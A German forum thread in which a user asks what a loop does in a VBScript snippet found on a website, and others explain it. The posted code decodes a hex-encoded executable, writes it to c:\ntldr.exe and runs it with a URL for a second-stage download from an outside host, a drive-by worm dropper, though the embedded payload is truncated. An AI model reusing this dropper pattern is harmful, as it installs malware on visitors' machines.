wozu die Schleife ?

E

etrance

Aktives Mitglied
Thread Starter
Dabei seit
08.08.2004
Beiträge
141
Reaktionspunkte
0
kann jemand mir erklären wie die schleife funktioniert ? habe zufällig
bei sürfen auf Desktop bekommt ...wäre unter Windows wahrscheinlich
zum ausführen gekommen :)

<script language=vbscript>
c0 = "4D5A90000300000004000000504500004C01020046534721..sehr lang noch :) .."
h0 = ""
i = 1
Do While i < Len(c0)
c = chr(cint("&h" & mid(c0, i, 2)))
h0 = h0 & c
i = i + 2
Loop
</script>
 
Falsches Forum, du bist hier in PHP nicht in VB ;)

Die Schleife: Während i kleiner als Len(c0) (kenne mich mit VB nicht aus, wird wohl Zeichenkettenlänge sein oder so) ist, wird die Schleife ausgeführt.
 
also ich denke mal das dient primär dazu deinen rechner auszubremsen.
 
Irgendwie wird da die Zeichenkette c0 zerschnipselt und dann in der Variable h0 wieder zusammengesetzt. Fragt mich aber nicht was für einen Sinn das haben soll...
 
ich kenne mit Scripten nicht aus aber ist es so einfach eine SystemObject zuerzeugen und dann auszuführen ?
Die PHP Datei was ich bekomme habe sind noch mehr drin habe nur ausschnitt gepostet.
Wenn ich richtig den code verstanden habe ist dass ein Textfile mit den Endung .exe erzeugen können :( und mit code gefuttet wird

var fs = new ActiveXObject('Scripting.FileSystemObject');
var ts = fs.CreateTextFile("c:\\ntldr.exe", true, false);
ts.Write(h0);
ts.Close();
var wsh = new ActiveXObject('WScript.Shell');
wsh.Run("c:\\ntldr.exe http://www.foxik.com/hb/dllwrap.exe",0);
window.close();

nach Info im Internet ist es ein Wurm. Was macht wohl dllwrap.exe ?? hätte gern jetzt VPC um es zuprobieren
 
Das ist wohlgemerkt kein PHP, sondern VisualBasic Script, eine von MS entwickelte Skriptsprache, die primär dazu dient Sicherheitslücken zu öffnen :D

Damit das Ding funktioniert muss man
a) Windows benutzen
b) mit dem IE surfen
c) die Sicherheitseinstellungen auf einem SEHR niedrigen Level haben